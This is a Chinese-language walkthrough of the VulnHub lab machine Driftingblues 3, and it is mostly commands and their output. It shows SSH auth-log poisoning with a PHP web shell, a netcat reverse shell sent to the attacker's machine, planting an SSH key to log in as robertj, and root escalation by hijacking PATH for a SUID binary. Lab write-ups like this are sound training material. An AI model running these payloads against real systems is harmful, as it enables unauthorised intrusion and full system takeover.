Vulnhub之Driftingblues 3靶机解题过程
Driftingblues 3
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.17.55.0/16 | Screen View: Unique Hosts
6 Captured ARP Req/Rep packets, from 3 hosts. Total size: 360
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:89:65:85 3 180 PCS Systemtechnik GmbH
192.168.56.192 08:00:27:21:cd:af 2 120 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标的IP地址为192.168.56.192
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.192 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-18 23:54 EST
Nmap scan report for bogon (192.168.56.192)
Host is up (0.000078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/eventadmins
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:21:CD:AF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.09 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH服务)、80(HTTP服务)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/robots.txt
User-agent: *
Disallow: /eventadmins
──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/eventadmins/
<!DOCTYPE html>
<html>
<body>
<p>man there's a problem with ssh</p>
<p>john said "it's poisonous!!! stay away!!!"</p>
<p>idk if he's mentally challenged</p>
<p>please find and fix it</p>
<p>also check /littlequeenofspades.html</p>
<p>your buddy, buddyG</p>
</body>
</html>
返回的页面包含新的页面链接,并且还暴露了可能是用户名的信息:john, idk, buddyG
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/littlequeenofspades.html
<!DOCTYPE html>
<html>
<body>
<p>Now, she is a little queen of spades, and the men will not let her be </p>
<p>Mmmm, she is the little queen of spades, and the men will not let her be </p>
<p>Everytime she makes a spread, hoo fair brown, cold chill just runs all over me </p>
<p>I'm gon' get me a gamblin' woman, if the last thing that I do </p>
<p>Eee, gon' get me a gamblin' woman, if it's the last thing that I do </p>
<p>Well, a man don't need a woman, ooh fair brown, that he got to give all his money to </p>
<p>Everybody say she got a mojo, now she's been usin' that stuff </p>
<p>Mmmm, mmmm, 'verybody says she got a mojo, 'cause she been usin' that stuff </p>
<p>But she got a way trimmin' down, hoo fair brown, and I mean it's most too tough </p>
<p>Now, little girl, since I am the king, baby, and you is a queen </p>
<p>Ooo eee, since I am the king baby, and you is a queen </p>
<p>Le's us put our heads together, hoo fair brown, then we can make our money green </p>
<p style="color:white">aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==</p>
</html>
返回页面源代码里的P标签的文字,应该style是white,所以看不到,先把它解码:
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ echo "aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==" | base64 -d
intruder? L2FkbWluc2ZpeGl0LnBocA==
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ echo "L2FkbWluc2ZpeGl0LnBocA==" | base64 -d
/adminsfixit.php
又发现了一个页面,而且跟/eventadmins页面的内容有呼应,似乎是跟ssh相关
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/adminsfixit.php
<!DOCTYPE html>
<html>
<body>
<p>#######################################################################</p>
<p>ssh auth log</p>
<p>============</p>
<p>i hope some wacky and uncharacteristic thing would not happen</p>
<p>this job is fucking poisonous and im boutta planck length away from quitting this hoe</p>
<p>-abuzer komurcu</p>
<p>#######################################################################</p>
<p> </p>
<p> </p>
</html>
Nov 18 22:41:01 driftingblues CRON[752]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:41:01 driftingblues CRON[752]: pam_unix(cron:session): session closed for user root
Nov 18 22:42:01 driftingblues CRON[756]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:42:01 driftingblues CRON[756]: pam_unix(cron:session): session closed for user root
Nov 18 22:43:01 driftingblues CRON[760]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:43:01 driftingblues CRON[760]: pam_unix(cron:session): session closed for user root
Nov 18 22:44:01 driftingblues CRON[764]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:44:01 driftingblues CRON[764]: pam_unix(cron:session): session closed for user root
Nov 18 22:45:01 driftingblues CRON[768]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:45:01 driftingblues CRON[768]: pam_unix(cron:session): session closed for user root
Nov 18 22:46:01 driftingblues CRON[777]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:46:01 driftingblues CRON[777]: pam_unix(cron:session): session closed for user root
Nov 18 22:47:01 driftingblues CRON[781]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:47:01 driftingblues CRON[781]: pam_unix(cron:session): session closed for user root
Nov 18 22:48:01 driftingblues CRON[785]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:48:01 driftingblues CRON[785]: pam_unix(cron:session): session closed for user root
Nov 18 22:49:01 driftingblues CRON[789]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:49:01 driftingblues CRON[789]: pam_unix(cron:session): session closed for user root
Nov 18 22:50:01 driftingblues CRON[798]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:50:01 driftingblues CRON[798]: pam_unix(cron:session): session closed for user root
Nov 18 22:51:01 driftingblues CRON[803]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:51:01 driftingblues CRON[803]: pam_unix(cron:session): session closed for user root
Nov 18 22:52:01 driftingblues CRON[807]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:52:01 driftingblues CRON[807]: pam_unix(cron:session): session closed for user root
Nov 18 22:53:01 driftingblues CRON[811]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:53:01 driftingblues CRON[811]: pam_unix(cron:session): session closed for user root
Nov 18 22:54:01 driftingblues CRON[815]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:54:01 driftingblues CRON[815]: pam_unix(cron:session): session closed for user root
Nov 18 22:54:39 driftingblues sshd[823]: Did not receive identification string from 192.168.56.137 port 38088
Nov 18 22:54:45 driftingblues sshd[824]: Protocol major versions differ for 192.168.56.137 port 40350: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-Nmap-SSH1-Hostkey
Nov 18 22:54:45 driftingblues sshd[825]: Protocol major versions differ for 192.168.56.137 port 40364: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2 vs. SSH-1.5-NmapNSE_1.0
Nov 18 22:54:45 driftingblues sshd[826]: Unable to negotiate with 192.168.56.137 port 40380: no matching host key type found. Their offer: ssh-dss [preauth]
Nov 18 22:54:45 driftingblues sshd[828]: Connection closed by 192.168.56.137 port 40382 [preauth]
Nov 18 22:54:45 driftingblues sshd[830]: Connection closed by 192.168.56.137 port 40398 [preauth]
Nov 18 22:54:45 driftingblues sshd[832]: Unable to negotiate with 192.168.56.137 port 40400: no matching host key type found. Their offer: ecdsa-sha2-nistp384 [preauth]
Nov 18 22:54:45 driftingblues sshd[834]: Unable to negotiate with 192.168.56.137 port 40404: no matching host key type found. Their offer: ecdsa-sha2-nistp521 [preauth]
Nov 18 22:54:45 driftingblues sshd[836]: Connection closed by 192.168.56.137 port 40418 [preauth]
Nov 18 22:55:01 driftingblues CRON[838]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:55:01 driftingblues CRON[838]: pam_unix(cron:session): session closed for user root
Nov 18 22:56:01 driftingblues CRON[844]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:56:01 driftingblues CRON[844]: pam_unix(cron:session): session closed for user root
Nov 18 22:57:01 driftingblues CRON[848]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:57:01 driftingblues CRON[848]: pam_unix(cron:session): session closed for user root
Nov 18 22:58:01 driftingblues CRON[852]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:58:01 driftingblues CRON[852]: pam_unix(cron:session): session closed for user root
Nov 18 22:59:01 driftingblues CRON[860]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 22:59:01 driftingblues CRON[860]: pam_unix(cron:session): session closed for user root
Nov 18 23:00:01 driftingblues CRON[864]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:00:01 driftingblues CRON[864]: pam_unix(cron:session): session closed for user root
Nov 18 23:01:01 driftingblues CRON[869]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:01:01 driftingblues CRON[869]: pam_unix(cron:session): session closed for user root
Nov 18 23:02:01 driftingblues CRON[873]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:02:01 driftingblues CRON[873]: pam_unix(cron:session): session closed for user root
Nov 18 23:03:01 driftingblues CRON[877]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:03:01 driftingblues CRON[877]: pam_unix(cron:session): session closed for user root
Nov 18 23:04:01 driftingblues CRON[885]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:04:01 driftingblues CRON[885]: pam_unix(cron:session): session closed for user root
Nov 18 23:05:01 driftingblues CRON[889]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:05:01 driftingblues CRON[889]: pam_unix(cron:session): session closed for user root
Nov 18 23:06:01 driftingblues CRON[893]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov 18 23:06:01 driftingblues CRON[893]: pam_unix(cron:session): session closed for user root
Nov 18 23:07:01 driftingblues CRON[898]: pam_unix(cron:session): session opened for user root by (uid=0)
是否可以将命令注入这个ssh auth log文件,然后访问这个文件从而执行这个文件
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ ssh '<?php system($_GET["cmd"]); ?>'@192.168.56.192
The authenticity of host '192.168.56.192 (192.168.56.192)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:35: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.192' (ED25519) to the list of known hosts.
<?php system($_GET["cmd"]); ?>@192.168.56.192: Permission denied (publickey).
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ curl http://192.168.56.192/adminsfixit.php?cmd=whoami | grep www
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 43535 0 43535 0 0 10.7M 0 --:--:-- --:--:-- --:--:-- 13.8M
Nov 19 01:56:41 driftingblues sshd[2118]: Invalid user www-data
Nov 19 01:56:41 driftingblues sshd[2118]: Connection closed by invalid user www-data
发现可以正常执行命令,那么接下来设法将shell反弹回Kali Linux
在浏览器中访问:
http://192.168.56.192/adminsfixit.php?cmd=nc%20-e%20/bin/sh%20192.168.56.137%205555
在Kali Linux中成功得到了目标主机返回来的shell
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.192] 46014
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@driftingblues:/var/www/html$
进入家目录发现打不开user的flag,查看.ssh发现里面没有ras ,有点奇怪,查看ssh配置文件/etc/ssh/sshd_config,发现可以使用公钥登入,并且给出了文件名/home/robertj/.ssh/authorized_keys
www-data@driftingblues:/home/robertj/.ssh$ cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $
# This is the sshd server system-wide configuration file. See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented. Uncommented options override the
# default value.
Port 22
#AddressFamily any
ListenAddress 0.0.0.0
#ListenAddress ::
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
SyslogFacility AUTH
LogLevel INFO
# Authentication:
#LoginGraceTime 2m
PermitRootLogin no
StrictModes no
#MaxAuthTries 6
#MaxSessions 10
PubkeyAuthentication yes
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
AuthorizedKeysFile /home/robertj/.ssh/authorized_keys
现在就按照要求(文件名根据sshd_config的要求)
www-data@driftingblues:/home/robertj/.ssh$ ssh-keygen -t rsa
ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/var/www/.ssh/id_rsa): /home/robertj/.ssh/authorized_keys
/home/robertj/.ssh/authorized_keys
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/robertj/.ssh/authorized_keys.
Your public key has been saved in /home/robertj/.ssh/authorized_keys.pub.
The key fingerprint is:
SHA256:qQfcINfB0fG3Z+xjF6hiFyQicLTXPUe2j3NGJUGf088 www-data@driftingblues
The key's randomart image is:
+---[RSA 2048]----+
| ..o .oo.. ++..|
| o ..o.o.o .o+|
| .ooo.o +.o.+o|
| +oo..o o.=+o|
| o S . +.=E|
| o o ++.|
| . .o o oo|
| .. o . o|
| |
+----[SHA256]-----+
重命名公钥文件名使其与sshd_config完全一致
www-data@driftingblues:/home/robertj/.ssh$ ls -alh
ls -alh
total 16K
drwx---rwx 2 robertj robertj 4.0K Nov 19 02:22 .
drwxr-xr-x 3 robertj robertj 4.0K Jan 4 2021 ..
-rw------- 1 www-data www-data 1.8K Nov 19 02:22 authorized_keys
-rw-r--r-- 1 www-data www-data 404 Nov 19 02:22 authorized_keys.pub
www-data@driftingblues:/home/robertj/.ssh$ cat authorized_keys > id_rsa
cat authorized_keys > id_rsa
www-data@driftingblues:/home/robertj/.ssh$ cat authorized_keys.pub > authorized_keys
<rtj/.ssh$ cat authorized_keys.pub > authorized_keys
www-data@driftingblues:/home/robertj/.ssh$ which python
which python
/usr/bin/python
www-data@driftingblues:/home/robertj/.ssh$ which python3
which python3
/usr/bin/python3
www-data@driftingblues:/home/robertj/.ssh$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.137 - - [19/Nov/2022 02:26:58] "GET /id_rsa HTTP/1.1" 200 -
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue3]
└─$ ssh -i id_rsa robertj@192.168.56.192
Enter passphrase for key 'id_rsa':
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
robertj@driftingblues:~$ id
uid=1000(robertj) gid=1000(robertj) groups=1000(robertj),1001(operators)
robertj@driftingblues:~$
得到user flag
robertj@driftingblues:~$ ls
user.txt
robertj@driftingblues:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
robertj@driftingblues:~$
提权
将linpeas.sh脚本上传至目标主机的/tmp目录,修改权限,并执行该脚本,输出结果中发现了一个执行文件:
robertj@driftingblues:~$ ls -alh /usr/bin/getinfo
-r-sr-s--- 1 root operators 17K Jan 4 2021 /usr/bin/getinfo
robertj@driftingblues:~$ /usr/bin/getinfo
###################
ip address
###################
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:21:cd:af brd ff:ff:ff:ff:ff:ff
inet 192.168.56.192/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 348sec preferred_lft 348sec
inet6 fe80::a00:27ff:fe21:cdaf/64 scope link
valid_lft forever preferred_lft forever
###################
hosts
###################
127.0.0.1 localhost
127.0.1.1 driftingblues
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
###################
os info
###################
Linux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
robertj@driftingblues:~$
getinfo这个命令应该是执行了ip 命令等,因此接下来提权就是设法生成一个同名的文件,比如ip,而这个ip其实执行的是/bin/bash, 可以将这个ip文件放在/tmp,并且修改$PATH 变量
$
robertj@driftingblues:~$ export PATH=/tmp:$PATH
robertj@driftingblues:~$ cd /tmp
robertj@driftingblues:/tmp$ echo '/bin/bash' > ip
robertj@driftingblues:/tmp$ chmod 777 ip
robertj@driftingblues:/tmp$ /usr/bin/getinfo
###################
ip address
###################
root@driftingblues:/tmp# cd /root
root@driftingblues:/root# ls -alh
total 20K
drwx------ 2 root root 4.0K Jan 4 2021 .
drwxr-xr-x 18 root root 4.0K Dec 17 2020 ..
-rw------- 1 root root 48 Jan 4 2021 .bash_history
-r-x------ 1 root root 1.8K Dec 17 2020 root.txt
-rw-r--r-- 1 root root 1.1K Jan 4 2021 upit
root@driftingblues:/root# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
root@driftingblues:/root#
成功拿到了root flag.
STRIVE FOR PROGRESS,NOT FOR PERFECTION
